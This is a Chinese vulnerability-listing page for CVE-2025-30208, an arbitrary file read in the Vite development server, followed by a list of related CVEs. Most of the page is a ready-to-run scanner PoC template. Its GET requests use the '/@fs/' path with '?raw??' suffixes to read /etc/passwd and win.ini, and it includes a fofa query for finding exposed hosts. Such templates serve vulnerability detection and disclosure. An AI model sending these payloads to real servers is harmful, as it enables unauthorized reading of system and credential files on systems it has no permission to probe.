CVE-2025-30208: Vite 任意文件读取漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2025-30208

info:
  name: Vite 任意文件读取漏洞
  author: 左轮改AK
  severity: high
  verified: true
  description: |-
    fofa: body="/@vite/client"
  affected: |
    6.2.0 >= Vite <=6.2.2
    6.1.0 >= Vite <=6.1.1
    6.0.0 >= Vite <=6.0.11
    5.0.0 >= Vite <=5.4.14
    Vite <=4.5.9
  references:
    - https://mp.weixin.qq.com/s/wYJOSws7rZM06mnj950zwg
  tags: cve,cve2025,vite,fileread

rules:
  r0:
    request:
      method: GET
      path: /@fs/etc/passwd?raw??
    expression: response.body.bcontains(b"export default") && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r1:
    request:
      method: GET
      path: /@fs/C://windows/win.ini?import&raw??
    expression: response.body.bcontains(b"export default") && response.body.bcontains(b"for 16-bit app support")
expression: r0() || r1()

相关漏洞推荐

• CVE-2025-24963: Vitest Browser Mode - Local File Read POC

  2025-08-01 | Vitest
  Vitest is a testing framework powered by Vite. The `__screenshot-error` handler on the browser mode ...

• CVE-2025-30208: Vite - Arbitrary File Read POC

  2025-08-01 | Vite
  Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6....

• CVE-2025-31125: Vite Development Server - Path Traversal POC

  2025-08-01 | Vite Development Server
  Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to acce...

• Wordpress Plugin Depicter /wp-admin/admin-ajax.php depicter-lead-list SQL 注入漏洞（CVE-2025-2011） 无POC

  2025-09-19 | Wordpress
  WordPress插件Depicter的滑块和弹出窗口构建器在包括3.6.1版本在内的所有版本中，由于用户提供的参数缺乏足够的转义处理和现有SQL查询的预处理不足，存在通用的SQL注入漏洞。该漏洞可以...

• Wordpress Plugin Eventin /wp-admin/admin-ajax.php proxy_image 文件读取漏洞（CVE-2025-3419） 无POC

  2025-09-19 | Wordpress
  Event Manager, Events Calendar, Tickets, Registrations – Eventin 是一个用于 WordPress 的插件。该漏洞存在于其 proxy_i...